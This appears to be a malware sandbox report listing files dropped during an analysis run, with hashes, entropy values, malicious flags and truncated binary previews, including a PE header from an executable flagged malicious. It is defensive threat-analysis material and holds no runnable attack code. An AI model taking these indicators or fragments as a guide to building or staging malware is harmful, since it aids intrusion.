                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8460658585071092
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxDvYJxl9Il8uV370hC2d86dHSGgtb7uEd1rc:mWAYb70U2iA9gt2D
                                                                                                                                                                                                                                                                                                MD5:19BD98697E3FD4E393A78E0DF932989F
                                                                                                                                                                                                                                                                                                SHA1:772CFEB98D72FD5A53AD33AAE4AD2FB10BA3D0CA
                                                                                                                                                                                                                                                                                                SHA-256:7B0D346936CA84DF4789A4CDBD42C4E65AA4884683A97F2486306E49739468B0
                                                                                                                                                                                                                                                                                                SHA-512:949403859B044F918C5CB4B25BA61E2DE9ECC640B9DB67359A373A5E0B390D1E503185258D84388EB927D8D7FA08C2A999A07272A2553876B2C703DAD6B80888
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.F.f.Y.u.g.Z.h.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.u.O.r.6.a.8.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.001252661427602
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:fYjQZgRBWgad+3PIQCffTCnQ/mQOMrVvyP9iyyA:fOKgmgMIIQCz0Im4hK4A
                                                                                                                                                                                                                                                                                                MD5:2FBECFF73D486BD29F0BEDC96443E761
                                                                                                                                                                                                                                                                                                SHA1:10045FC7F907C457BC7B715CABBDC96E6D1795B5
                                                                                                                                                                                                                                                                                                SHA-256:43C10F314A459CD991C8135A517461816768A1932DB1A7D227706757740CDE7C
                                                                                                                                                                                                                                                                                                SHA-512:0BA10190CF85028824C7B6DA8CEE42E7793A813219ED1E827B8A6E513DB643F0DA9D6E40EFB5EB5C1062AAE8F028476ECF0FB9C8A9B7234B219FCEF4F7C945AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".r.x.a.S.o.P.5.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.u.O.r.6.a.8.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9131436698960678
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7x4jxl9Il8uQVa0E9FVUV8tLtTQ4Mk03rNuOSJPd/vc:aqHYGa08NVQ4Mk+uTJK
                                                                                                                                                                                                                                                                                                MD5:5BABD5D3BC7B1BAD51137A25DAFDFEA3
                                                                                                                                                                                                                                                                                                SHA1:CC762703A46A93E65F8A94767AA478F3F42E1B2B
                                                                                                                                                                                                                                                                                                SHA-256:04E34A7A54C3462CEF9E4BC1A01B834ACB78E0E445C260ED192CF0AD2C510D4D
                                                                                                                                                                                                                                                                                                SHA-512:43FED513410AAA7DE71B5B8281C5762B88DEE4751F0A03994F2E7815B84751B71C3B2276E372AC2C45FDAD011DEDF61C4C008C6A9524D95E96882116F262B3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".K.m.y.C.0.M.9./.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.u.O.r.6.a.8.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\24d7834c-1b06-48dc-93fd-8dd9c871f0e7.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1600231
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.991787532372992
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:24576:QEhySsxs1bpGHEcp5bEuqYhzXXn86KW0Y2IDQNFnw+oLl4CSkGpyu0GAZYUWX6Jf:VyS0s1bpGkIJ/lrs6Kxtml4CShmYG3N
                                                                                                                                                                                                                                                                                                MD5:2567A1C96C23C3D657B49075BD262760
                                                                                                                                                                                                                                                                                                SHA1:2F898C0B38C3F91714862C023D96DEB73452A1E2
                                                                                                                                                                                                                                                                                                SHA-256:FAFDED8BF7C48286CB77810AF32F6A3E3C7129EC03233D615AA71B49342ED135
                                                                                                                                                                                                                                                                                                SHA-512:271224BD182CA473BD757816CB060834B39CE50A582C9EF78C154BBE3FFACDC7431BCA2F60B37CEAA2BC3F6B6E47116E563005A846BE969A4D628274C8A1F2B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..*pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ*.>...i.v....A.CD|bfx....).o.g.....I....6...!....<.t*|"....PO*<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~.*.&........:]...*w.md./zkT.Z..F........,."7|.|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\2595f075

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):5661033
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.709040130458965
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:1dqC7d1fsL0RPFRBzmjudA/chYltXevSj3DVqft9Q5iEBtbrNp4ID+GUFz4lB4rA:1dqC7jfhPFRhmjudA/chYltXevSj3DVl
                                                                                                                                                                                                                                                                                                MD5:668FB66C21BD32CF34AD0D5A3F366C2F
                                                                                                                                                                                                                                                                                                SHA1:F262893069FAF4B5603C98DDBBAA6C10B20940BE
                                                                                                                                                                                                                                                                                                SHA-256:182151677AEDC2FF2AFB4D3DE51C03BE85048838237DBA485E2203B45C6C5D64
                                                                                                                                                                                                                                                                                                SHA-512:E8C7454EDB6D825041BDC9A3791530FFFA08DB182BD811F70F76017D76286A0DD38F4B208EBF22BDF6ACA251FC90AD479B510216AB3037C98D9037940715A563
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:y^..{^..z^..z^..{^..^^..n^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^.._...>..._....,...8..-7...)..)*...~...+...1...3..)*...+.z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..91...*...7..?&..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..91...?..30...0..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^.._...>..&....1...*..?....?...1..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^...l..Tk..Hi..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3bdc9639

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):5661033
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.709040086111673
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:qdqC7d1fsL0RPFRBzmjudA/chYltXevSj3DVqft9Q5iEBtbrNp4ID+GUFz4lB4rA:qdqC7jfhPFRhmjudA/chYltXevSj3DVl
                                                                                                                                                                                                                                                                                                MD5:22AD46A96601227B66E14C32ECF7B55A
                                                                                                                                                                                                                                                                                                SHA1:A24F0EC406F4CDF130473D8A901A47453A4A9586
                                                                                                                                                                                                                                                                                                SHA-256:A5BA88AB81D6B011E343B7453356288DF7BE38E17BA8AAE6C9855D2624DEB02C
                                                                                                                                                                                                                                                                                                SHA-512:9AEB3292F3F2ED90EF4B3D8E8A094C5EAC96583E553B02749C2034404F6444A82557300153E9DEB09CE67B582EF8280FF95F505ED19F348B26F3BB9836C21981
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:y^..{^..z^..z^..{^..^^..n^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^.._...>..._....,...8..-7...)..)*...~...+...1...3..)*...+.z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..91...*...7..?&..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..91...?..30...0..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^.._...>..&....1...*..?....?...1..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^...l..Tk..Hi..z^..z^..z^..z^..z^..z^..z^..z^..z^..z^..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\8b2177e8-492e-41f9-87cb-67eddcc22a84.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\997dd3a7-57b7-47d7-b8c1-b088127feecf.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):2364728
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.606009669324617
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                                                                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                                                                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                                                                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                • Filename: w3245.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: w3245.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: 9mauyKC3JW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: UolJwovI8c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: ONHQNHFT.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: es.hta, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Scabbard_20250107071812.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):987
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4459178721419805
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:p3bAIeLLzzgu33mvcP2ctvcP2D2cP2LZv4Eq2cP2d2cP2W:prxY0didiaROZveRCR1
                                                                                                                                                                                                                                                                                                MD5:ED5E6C19D832A3A99D486F82DAFBA4FD
                                                                                                                                                                                                                                                                                                SHA1:BE25D4291F40A5F3D7A657E2546856FC536CA15D
                                                                                                                                                                                                                                                                                                SHA-256:EAB28456C0BB5C1B13EE5B8D1DE950F73F7B0BACAECB3FAE16A732CC63BFD0C2
                                                                                                                                                                                                                                                                                                SHA-512:B2147F196E2EA5E0FCD0CB61EC7EB1E9B82E4B4328B5ACBE474F527D2C2CE86332AEAFFB1CCA78AAA8AB9375B126A43753716D4CE05BA4F331B185C6C5922EBE
                                                                                                                                                                                                                                                                                                Malicious:false
